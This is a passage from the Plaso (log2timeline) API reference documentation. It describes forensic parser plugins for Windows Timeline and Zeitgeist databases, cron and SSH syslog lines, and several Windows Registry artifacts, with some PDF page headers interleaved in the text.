SCHEMAS = [{'Activity': 'CREATE TABLE [Activity]([Id] GUID PRIMARY KEY NOT NULL, [AppId] TEXT NOT NULL, [PackageIdHash] TEXT, [AppActivityId] TEXT, [ActivityType] INT NOT NULL, [ActivityStatus] INT NOT NULL, [ParentActivityId] GUID, [Tag] TEXT, [Group] TEXT, [MatchId] TEXT, [LastModifiedTime] DATETIME NOT NULL, [ExpirationTime] DATETIME, [Payload] BLOB, [Priority] INT, [IsLocalOnly] INT, [PlatformDeviceId] TEXT, [CreatedInCloud] DATETIME, [StartTime] DATETIME, [EndTime] DATETIME, [LastModifiedOnClient] DATETIME, [GroupAppActivityId] TEXT, [ClipboardPayload] BLOB, [EnterpriseId] TEXT, [OriginalPayload] BLOB, [OriginalLastModifiedOnClient] DATETIME, [ETag] INT NOT NULL)', 'ActivityAssetCache': 'CREATE TABLE [ActivityAssetCache]([ResourceId] INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, [AppId] TEXT NOT NULL, [AssetHash] TEXT NOT NULL, [TimeToLive] DATETIME NOT NULL, [AssetUri] TEXT, [AssetId] TEXT, [AssetKey] TEXT, [Contents] BLOB)', 'ActivityOperation': 'CREATE TABLE [ActivityOperation]([OperationOrder] INTEGER PRIMARY KEY ASC NOT NULL, [Id] GUID NOT NULL, [OperationType] INT NOT NULL, [AppId] TEXT NOT NULL, [PackageIdHash] TEXT, [AppActivityId] TEXT, [ActivityType] INT NOT NULL, [ParentActivityId] GUID, [Tag] TEXT, [Group] TEXT, [MatchId] TEXT, [LastModifiedTime] DATETIME NOT NULL, [ExpirationTime] DATETIME, [Payload] BLOB, [Priority] INT, [CreatedTime] DATETIME, [Attachments] TEXT, [PlatformDeviceId] TEXT, [CreatedInCloud] DATETIME, [StartTime] DATETIME NOT NULL, [EndTime] DATETIME, [LastModifiedOnClient] DATETIME NOT NULL, [CorrelationVector] TEXT, [GroupAppActivityId] TEXT, [ClipboardPayload] BLOB, [EnterpriseId] TEXT, [OriginalPayload] BLOB, [OriginalLastModifiedOnClient] DATETIME, [ETag] INT NOT NULL)', 'Activity_PackageId': 'CREATE TABLE [Activity_PackageId]([ActivityId] GUID NOT NULL, [Platform] TEXT NOT NULL, [PackageName] TEXT NOT NULL, [ExpirationTime] DATETIME NOT NULL)', 'AppSettings': 'CREATE TABLE [AppSettings]([AppId] TEXT PRIMARY KEY NOT NULL, [SettingsPropertyBag] BLOB, [AppTitle] TEXT, [Logo4141] TEXT)', 'ManualSequence': 'CREATE TABLE [ManualSequence]([Key] TEXT PRIMARY KEY NOT NULL, [Value] INT NOT NULL)', 'Metadata': 'CREATE TABLE [Metadata]([Key] TEXT PRIMARY KEY NOT NULL, [Value] TEXT)'}, {'Activity': 'CREATE TABLE [Activity]([Id] GUID PRIMARY KEY NOT NULL, [AppId] TEXT NOT NULL, [PackageIdHash] TEXT, [AppActivityId] TEXT, [ActivityType] INT NOT NULL, [ActivityStatus] INT NOT NULL, [ParentActivityId] GUID, [Tag] TEXT, [Group] TEXT, [MatchId] TEXT, [LastModifiedTime] DATETIME NOT NULL, [ExpirationTime] DATETIME, [Payload] BLOB, [Priority] INT, [IsLocalOnly] INT, [PlatformDeviceId] TEXT, [CreatedInCloud] DATETIME, [StartTime] DATETIME, [EndTime] DATETIME, [LastModifiedOnClient] DATETIME, [GroupAppActivityId] TEXT, [ClipboardPayload] BLOB, [EnterpriseId] TEXT, [OriginalPayload] BLOB, [UserActionState] INT,[IsRead] INT,[OriginalLastModifiedOnClient] DATETIME, [GroupItems] TEXT, [ETag] INT NOT NULL)', 'ActivityAssetCache': 'CREATE TABLE [ActivityAssetCache]([ResourceId] INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, [AppId] TEXT NOT NULL, [AssetHash] TEXT NOT NULL, [TimeToLive] DATETIME NOT NULL, [AssetUri] TEXT, [AssetId] TEXT, [AssetKey] TEXT, [Contents] BLOB)', 'ActivityOperation': 'CREATE TABLE [ActivityOperation]([OperationOrder] INTEGER PRIMARY KEY ASC NOT NULL, [Id] GUID NOT NULL, [OperationType] INT NOT NULL, [AppId] TEXT NOT NULL, [PackageIdHash] TEXT, [AppActivityId] TEXT, [ActivityType] INT NOT NULL, [ParentActivityId] GUID, [Tag] TEXT, [Group] TEXT, [MatchId] TEXT, [LastModifiedTime] DATETIME NOT NULL, [ExpirationTime] DATETIME, [Payload] BLOB, [Priority] INT, [CreatedTime] DATETIME, [OperationExpirationTime] DATETIME,[Attachments] TEXT, [PlatformDeviceId] TEXT, [CreatedInCloud] DATETIME, [StartTime] DATETIME NOT NULL, [EndTime] DATETIME, [LastModifiedOnClient] DATETIME NOT NULL, [CorrelationVector] TEXT, [GroupAppActivityId] TEXT, [ClipboardPayload] BLOB, [EnterpriseId] TEXT, [UserActionState] INT,[IsRead] INT,[OriginalPayload] BLOB, [OriginalLastModifiedOnClient] DATETIME, [UploadAllowedByPolicy] INT NOT NULL DEFAULT 1, [PatchFields] BLOB, [GroupItems] TEXT, [ETag] INT NOT NULL)', 'Activity_PackageId': 'CREATE TABLE [Activity_PackageId]([ActivityId] GUID NOT NULL, [Platform] TEXT NOT NULL COLLATE NOCASE, [PackageName] TEXT NOT NULL COLLATE 5.1. SubpackagesNOCASE, [ExpirationTime] DATETIME NOT NULL)', 'AppSettings': 'CREATE TABLE 313 [AppSettings]([AppId] TEXT PRIMARY KEY NOT NULL, [SettingsPropertyBag] BLOB, [AppTitle] TEXT, [Logo4141] TEXT)', 'DataEncryptionKeys': 'CREATE TABLE [DataEncryptionKeys]([KeyVersion] INTEGER PRIMARY KEY NOT NULL, [KeyValue] TEXT NOT NULL COLLATE NOCASE, [CreatedInCloudTime] DATETIME NOT NULL)', 'ManualSequence': 'CREATE TABLE [ManualSequence]([Key] TEXT PRIMARY KEY NOT NULL, [Value] INT NOT NULL)', 'Metadata': 'CREATE TABLE [Metadata]([Key] TEXT PRIMARY KEY NOT NULL, [Value] TEXT)'}] Plaso (log2timeline), Release 20210606 class plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineUserEngagedEventData Bases: plaso.containers.events.EventData Windows Timeline database User Engaged event data. Contains information describing how long a user interacted with an application for. package_identifier the package ID or location of the executable the user interacted with. Type str reporting_app the name of the application that reported the user’s interaction. This is the name of a monitoring tool, for example “ShellActivityMonitor”. Type str active_duration_seconds the number of seconds the user spent interacting with the program. Type int DATA_TYPE = 'windows:timeline:user_engaged' plaso.parsers.sqlite_plugins.zeitgeist module

SQLite parser plugin for Zeitgeist activity database files. class plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityDatabasePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Zeitgeist activity database files. Zeitgeist is a service which logs the user activities and events, anywhere from files opened to websites visited and conversations. DATA_FORMAT = 'Zeitgeist activity SQLite database file' NAME = 'zeitgeist' ParseZeitgeistEventRow(parser_mediator, query, row, **unused_kwargs) Parses a zeitgeist event row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT id, timestamp, subj_uri FROM event_view', 'ParseZeitgeistEventRow')] REQUIRED_STRUCTURE = {'actor': frozenset({}), 'event': frozenset({'id', 'subj_id', 'timestamp'}), 'uri': frozenset({'id'})}

314 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

SCHEMAS = [{'actor': 'CREATE TABLE actor ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )', 'event': 'CREATE TABLE event ( id INTEGER, timestamp INTEGER, interpretation INTEGER, manifestation INTEGER, actor INTEGER, payload INTEGER, subj_id INTEGER, subj_interpretation INTEGER, subj_manifestation INTEGER, subj_origin INTEGER, subj_mimetype INTEGER, subj_text INTEGER, subj_storage INTEGER, origin INTEGER, subj_id_current INTEGER, CONSTRAINT interpretation_fk FOREIGN KEY(interpretation) REFERENCES interpretation(id) ON DELETE CASCADE, CONSTRAINT manifestation_fk FOREIGN KEY(manifestation) REFERENCES manifestation(id) ON DELETE CASCADE, CONSTRAINT actor_fk FOREIGN KEY(actor) REFERENCES actor(id) ON DELETE CASCADE, CONSTRAINT origin_fk FOREIGN KEY(origin) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT payload_fk FOREIGN KEY(payload) REFERENCES payload(id) ON DELETE CASCADE, CONSTRAINT subj_id_fk FOREIGN KEY(subj_id) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT subj_id_current_fk FOREIGN KEY(subj_id_current) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT subj_interpretation_fk FOREIGN KEY(subj_interpretation) REFERENCES interpretation(id) ON DELETE CASCADE, CONSTRAINT subj_manifestation_fk FOREIGN KEY(subj_manifestation) REFERENCES manifestation(id) ON DELETE CASCADE, CONSTRAINT subj_origin_fk FOREIGN KEY(subj_origin) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT subj_mimetype_fk FOREIGN KEY(subj_mimetype) REFERENCES mimetype(id) ON DELETE CASCADE, CONSTRAINT subj_text_fk FOREIGN KEY(subj_text) REFERENCES text(id) ON DELETE CASCADE, CONSTRAINT subj_storage_fk FOREIGN KEY(subj_storage) REFERENCES storage(id) ON DELETE CASCADE, CONSTRAINT unique_event UNIQUE (timestamp, interpretation, manifestation, actor, subj_id) )', 'extensions_conf': 'CREATE TABLE extensions_conf ( extension VARCHAR, key VARCHAR, value BLOB, CONSTRAINT unique_extension UNIQUE (extension, key) )', 'interpretation': 'CREATE TABLE interpretation ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )', 'manifestation': 'CREATE TABLE manifestation ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )', 'mimetype': 'CREATE TABLE mimetype ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )', 'payload': 'CREATE TABLE payload (id INTEGER PRIMARY KEY, value BLOB)', 'schema_version': 'CREATE TABLE schema_version ( schema VARCHAR PRIMARY KEY ON CONFLICT REPLACE, version INT )', 'storage': 'CREATE TABLE storage ( id INTEGER PRIMARY KEY, value VARCHAR UNIQUE, state INTEGER, icon VARCHAR, display_name VARCHAR )', 'text': 'CREATE TABLE text ( id INTEGER PRIMARY KEY, value VARCHAR UNIQUE )', 'uri': 'CREATE TABLE uri ( id INTEGER PRIMARY KEY, value VARCHAR UNIQUE )'}] class plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityEventData Bases: plaso.containers.events.EventData Zeitgeist activity event data. offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str subject_uri subject URI. Type str DATA_TYPE = 'zeitgeist:activity'

5.1. Subpackages 315 Plaso (log2timeline), Release 20210606

Module contents

Imports for the SQLite database parser plugins. plaso.parsers.syslog_plugins package

Submodules plaso.parsers.syslog_plugins.cron module

This file contains a plugin for cron syslog entries. class plaso.parsers.syslog_plugins.cron.CronSyslogPlugin Bases: plaso.parsers.syslog_plugins.interface.SyslogPlugin A syslog plugin for parsing cron messages. DATA_FORMAT = 'Cron syslog line' MESSAGE_GRAMMARS = [('task_run', {{{{{{{"(" W:(ABCD...)} ")"} "CMD"} "("} Combine:(SkipTo:({")" StringEnd}))} ")"} StringEnd})] NAME = 'cron' REPORTER = 'CRON' class plaso.parsers.syslog_plugins.cron.CronTaskRunEventData Bases: plaso.parsers.syslog.SyslogLineEventData Cron task run event data. command command executed. Type str username name of user the command was executed. Type str DATA_TYPE = 'syslog:cron:task_run' plaso.parsers.syslog_plugins.interface module

This file contains the interface for syslog plugins. class plaso.parsers.syslog_plugins.interface.SyslogPlugin Bases: plaso.parsers.plugins.BasePlugin The interface for syslog plugins. DATA_FORMAT = 'Syslog file' MESSAGE_GRAMMARS = [] NAME = 'syslog_plugin' Process(parser_mediator, date_time, syslog_tokens, **kwargs) Processes the data structure produced by the parser.

316 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • date_time (dfdatetime.DateTimeValues) – date and time values. • syslog_tokens (dict[str, str]) – names of the fields extracted by the syslog parser and the matching grammar, and values are the values of those fields. Raises • AttributeError – If the syslog_tokens do not include a ‘body’ attribute. • WrongPlugin – If the plugin is unable to parse the syslog tokens. REPORTER = '' plaso.parsers.syslog_plugins.ssh module

This file contains a plugin for SSH syslog entries. class plaso.parsers.syslog_plugins.ssh.SSHEventData Bases: plaso.parsers.syslog.SyslogLineEventData SSH event data. address IP address. Type str authentication_method authentication method. Type str fingerprint fingerprint. Type str port port. Type str protocol protocol. Type str username name of user the command was executed. Type str class plaso.parsers.syslog_plugins.ssh.SSHFailedConnectionEventData Bases: plaso.parsers.syslog_plugins.ssh.SSHEventData SSH failed connection event data. DATA_TYPE = 'syslog:ssh:failed_connection'

5.1. Subpackages 317 Plaso (log2timeline), Release 20210606 class plaso.parsers.syslog_plugins.ssh.SSHLoginEventData Bases: plaso.parsers.syslog_plugins.ssh.SSHEventData SSH login event data. DATA_TYPE = 'syslog:ssh:login' class plaso.parsers.syslog_plugins.ssh.SSHOpenedConnectionEventData Bases: plaso.parsers.syslog_plugins.ssh.SSHEventData SSH opened connection event data. DATA_TYPE = 'syslog:ssh:opened_connection' class plaso.parsers.syslog_plugins.ssh.SSHSyslogPlugin Bases: plaso.parsers.syslog_plugins.interface.SyslogPlugin A plugin for creating events from syslog message produced by SSH. DATA_FORMAT = 'SSH syslog line' MESSAGE_GRAMMARS = [('login', {{{{{{{{{{"Accepted" {"password" | "publickey"}} "for"} W:(ABCD...)} "from"} {IPv4 address | IPv6 address}} "port"} W:(0123...)} "ssh2"} [{":" Combine:({"RSA " W:(:012...)})}]} StringEnd}), ('failed_connection', {{{{{{{{"Failed" {"password" | "publickey"}} "for"} W:(ABCD...)} "from"} {IPv4 address | IPv6 address}} "port"} W:(0123...)} StringEnd}), ('opened_connection', {{{{"Connection from" {IPv4 address | IPv6 address}} "port"} W:(0123...)} LineEnd})] NAME = 'ssh' REPORTER = 'sshd'

Module contents

Imports for the syslog parser. plaso.parsers.winreg_plugins package

Submodules plaso.parsers.winreg_plugins.amcache module

Windows Registry plugin to parse the AMCache.hve Root key. class plaso.parsers.winreg_plugins.amcache.AMCacheFileEventData Bases: plaso.containers.events.EventData AMCache file event data. company_name company name that created product file belongs to. Type str file_description description of file. Type str

318 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

file_reference file system file reference, for example 9-1 (MFT entry - sequence number). Type str file_size size of file in bytes. Type int file_version version of file. Type str full_path full path of file. Type str language_code language code of file. Type int product_name product name file belongs to. Type str program_identifier GUID of entry under Root/Program key file belongs to. Type str sha1 SHA-1 of file. Type str DATA_TYPE = 'windows:registry:amcache' class plaso.parsers.winreg_plugins.amcache.AMCachePlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin AMCache.hve Windows Registry plugin. DATA_FORMAT = 'AMCache (AMCache.hve)' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'amcache'

5.1. Subpackages 319 Plaso (log2timeline), Release 20210606 class plaso.parsers.winreg_plugins.amcache.AMCacheProgramEventData Bases: plaso.containers.events.EventData AMCache programs event data. entry_type type of entry (usually AddRemoveProgram). Type str file_paths file paths of installed program. Type str files list of files belonging to program. Type str language_code language_code of program. Type int msi_package_code MSI package code of program. Type str msi_product_code MSI product code of program. Type str name name of installed program. Type str package_code package code of program. Type str product_code product code of program. Type str publisher publisher of program. Type str uninstall_key unicode string of uninstall registry key for program. Type str version version of program. Type str DATA_TYPE = 'windows:registry:amcache:programs'

320 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.winreg_plugins.appcompatcache module

Windows Registry plugin to parse the Application Compatibility Cache key. class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheCachedEntry Bases: object Application Compatibility Cache cached entry. class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheEventData Bases: plaso.containers.events.EventData Application Compatibility Cache event data. entry_index cache entry index number for the record. Type int key_path Windows Registry key path. Type str offset offset of the Application Compatibility Cache entry relative to the start of the Windows Registry value data, from which the event data was extracted. Type int path full path to the executable. Type str DATA_TYPE = 'windows:registry:appcompatcache' class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheHeader Bases: object Application Compatibility Cache header. class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib. dtfabric_helper.DtFabricHelper Application Compatibility Cache data Windows Registry plugin. DATA_FORMAT = 'Application Compatibility Cache Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. Raises ParseError – if the value data could not be parsed. FILTERS = frozenset({, })

5.1. Subpackages 321 Plaso (log2timeline), Release 20210606

NAME = 'appcompatcache' plaso.parsers.winreg_plugins.bagmru module

This file contains BagMRU Windows Registry plugins (shellbags). class plaso.parsers.winreg_plugins.bagmru.BagMRUEventData Bases: plaso.containers.events.EventData BagMRU event data attribute container. entries most recently used (MRU) entries. Type str key_path Windows Registry key path. Type str DATA_TYPE = 'windows:registry:bagmru' class plaso.parsers.winreg_plugins.bagmru.BagMRUWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib. dtfabric_helper.DtFabricHelper Class that defines a BagMRU Windows Registry plugin. DATA_FORMAT = 'BagMRU (or ShellBags) Registry data' ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. • codepage (Optional[str]) – extended ASCII string codepage. FILTERS = frozenset({, , , , , }) NAME = 'bagmru'

322 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.winreg_plugins.bam module

Windows Registry plugin to parse the Background Activity Moderator keys. class plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorEventData Bases: plaso.containers.events.EventData Background Activity Moderator event data. binary_path binary executed. Type str user_sid user SID associated with entry. Type str DATA_TYPE = 'windows:registry:bam' class plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib. dtfabric_helper.DtFabricHelper Background Activity Moderator data Windows Registry plugin. DATA_FORMAT = 'Background Activity Moderator (BAM) Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. Raises ParseError – if the value data could not be parsed. FILTERS = frozenset({, }) NAME = 'bam' plaso.parsers.winreg_plugins.ccleaner module

Parser for the CCleaner Registry key. class plaso.parsers.winreg_plugins.ccleaner.CCleanerConfigurationEventData Bases: plaso.containers.events.EventData CCleaner configuration event data. configuration CCleaner configuration. Type str

5.1. Subpackages 323 Plaso (log2timeline), Release 20210606

key_path Windows Registry key path. Type str DATA_TYPE = 'ccleaner:configuration' class plaso.parsers.winreg_plugins.ccleaner.CCleanerPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Gathers the CCleaner Keys for NTUSER hive. Known Windows Registry values within the CCleaner key: * (App)Cookies [REG_SZ], contains “True” if the cookies should be cleaned; * (App)Delete Index.dat files [REG_SZ] * (App)History [REG_SZ] * (App)Last Download Location [REG_SZ] * (App)Other Explorer MRUs [REG_SZ] * (App)Recent Documents [REG_SZ] * (App)Recently Typed URLs [REG_SZ] * (App)Run (in Start Menu) [REG_SZ] * (App)Temporary Internet Files [REG_SZ] * (App)Thumbnail Cache [REG_SZ] * CookiesToSave [REG_SZ] * UpdateKey [REG_SZ], contains a date and time formatted as: “MM/DD/YYYY hh:mm:ss [A|P]M”, for example “07/13/2013 10:03:14 AM”;

• WINDOW_HEIGHT [REG_SZ], contains the windows height in number of pixels; • WINDOW_LEFT [REG_SZ] • WINDOW_MAX [REG_SZ] • WINDOW_TOP [REG_SZ] • WINDOW_WIDTH [REG_SZ], contains the windows width in number of pixels;

Also see: http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html DATA_FORMAT = 'CCleaner Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'ccleaner' class plaso.parsers.winreg_plugins.ccleaner.CCleanerUpdateEventData Bases: plaso.containers.events.EventData CCleaner update event data. key_path Windows Registry key path. Type str DATA_TYPE = 'ccleaner:update'

324 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

plaso.parsers.winreg_plugins.default module

The default Windows Registry plugin. class plaso.parsers.winreg_plugins.default.DefaultPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Default plugin that extracts minimum information from every Registry key. The default plugin will parse every Registry key that is passed to it and extract minimum information, such as a list of available values and if possible content of those values. The timestamp used is the timestamp when the Registry key was last modified. DATA_FORMAT = 'Windows Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. NAME = 'winreg_default' plaso.parsers.winreg_plugins.interface module

The Windows Registry plugin interface. class plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter Bases: object The Windows Registry key filter interface. abstract Match(registry_key) Determines if a Windows Registry key matches the filter. Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. Returns True if the keys match. Return type bool property key_paths key paths defined by the filter. Type list[str] class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter(key_path) Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter Windows Registry key path filter. Match(registry_key) Determines if a Windows Registry key matches the filter. Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. Returns True if the keys match. Return type bool

5.1. Subpackages 325 Plaso (log2timeline), Release 20210606

property key_paths List of key paths defined by the filter. class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathPrefixFilter(key_path_prefix) Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter Windows Registry key path prefix filter. Match(registry_key) Determines if a Windows Registry key matches the filter. Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. Returns True if the keys match. Return type bool class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathSuffixFilter(key_path_suffix) Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter Windows Registry key path suffix filter. Match(registry_key) Determines if a Windows Registry key matches the filter. Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. Returns True if the keys match. Return type bool class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter(value_names) Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter Windows Registry key with values filter. Match(registry_key) Determines if a Windows Registry key matches the filter. Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. Returns True if the keys match. Return type bool class plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Bases: plaso.parsers.plugins.BasePlugin The Windows Registry plugin interface. DATA_FORMAT = 'Windows Registry data' abstract ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'winreg_plugin' Process(parser_mediator, registry_key, **kwargs) Processes a Windows Registry key or value.

326 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. Raises ValueError – If the Windows Registry key is not set. UpdateChainAndProcess(parser_mediator, registry_key, **kwargs) Updates the parser chain and processes a Windows Registry key or value. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. Raises ValueError – If the Windows Registry key is not set. plaso.parsers.winreg_plugins.lfu module

Plug-in to collect the Less Frequently Used Keys. class plaso.parsers.winreg_plugins.lfu.BootExecutePlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Plug-in to collect the BootExecute Value from the Session Manager key. Also see: http://technet.microsoft.com/en-us/library/cc963230.aspx DATA_FORMAT = 'Boot Execution Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'windows_boot_execute' class plaso.parsers.winreg_plugins.lfu.BootVerificationPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Plug-in to collect the Boot Verification Key. Also see: http://technet.microsoft.com/en-us/library/cc782537(v=ws.10).aspx DATA_FORMAT = 'Windows boot verification Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters

5.1. Subpackages 327 Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'windows_boot_verify' class plaso.parsers.winreg_plugins.lfu.WindowsBootExecuteEventData Bases: plaso.containers.events.EventData Windows Boot Execute event data attribute container. key_path Windows Registry key path. Type str value boot execute value, contains the value obtained from the BootExecute Registry value. Type str DATA_TYPE = 'windows:registry:boot_execute' class plaso.parsers.winreg_plugins.lfu.WindowsBootVerificationEventData Bases: plaso.containers.events.EventData Windows Boot Verification event data attribute container. image_path location of the boot verification executable, contains the value obtained from the ImagePath Registry value. Type str key_path Windows Registry key path. Type str DATA_TYPE = 'windows:registry:boot_verification' plaso.parsers.winreg_plugins.mountpoints module

MountPoints2 Windows Registry parser plugin. class plaso.parsers.winreg_plugins.mountpoints.MountPoints2EventData Bases: plaso.containers.events.EventData Windows MountPoints2 event data attribute container. key_path Windows Registry key path. Type str label mount point label. Type str

328 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

name name of the mount point source. Type str server_name name of the remote drive server or None if not set. Type str share_name name of the remote drive share or None if not set. Type str type type of the mount point source, which can be “Drive”, “Remove Drive” or “Volume”. Type str DATA_TYPE = 'windows:registry:mount_points2' class plaso.parsers.winreg_plugins.mountpoints.MountPoints2Plugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Windows Registry plugin for parsing the MountPoints2 key. DATA_FORMAT = 'Windows Explorer mount points Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'explorer_mountpoints2' plaso.parsers.winreg_plugins.mrulist module

This file contains a MRUList Registry plugin. Also see: https://github.com/libyal/winreg-kb/blob/main/documentation/MRU%20keys.asciidoc class plaso.parsers.winreg_plugins.mrulist.BaseMRUListWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib. dtfabric_helper.DtFabricHelper Class for common MRUList Windows Registry plugin functionality. class plaso.parsers.winreg_plugins.mrulist.MRUListEventData Bases: plaso.containers.events.EventData MRUList event data attribute container. entries most recently used (MRU) entries.

5.1. Subpackages 329 Plaso (log2timeline), Release 20210606

Type str key_path Windows Registry key path. Type str DATA_TYPE = 'windows:registry:mrulist' class plaso.parsers.winreg_plugins.mrulist.MRUListShellItemListWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.mrulist.BaseMRUListWindowsRegistryPlugin Windows Registry plugin to parse a shell item list MRUList. DATA_FORMAT = 'Most Recently Used (MRU) Registry data' ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. • codepage (Optional[str]) – extended ASCII string codepage. FILTERS = frozenset({}) NAME = 'mrulist_shell_item_list' class plaso.parsers.winreg_plugins.mrulist.MRUListStringRegistryKeyFilter Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter Windows Registry key with values filter. Match(registry_key) Determines if a Windows Registry key matches the filter. Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. Returns True if the Windows Registry key matches the filter. Return type bool class plaso.parsers.winreg_plugins.mrulist.MRUListStringWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.mrulist.BaseMRUListWindowsRegistryPlugin Windows Registry plugin to parse a string MRUList. DATA_FORMAT = 'Most Recently Used (MRU) Registry 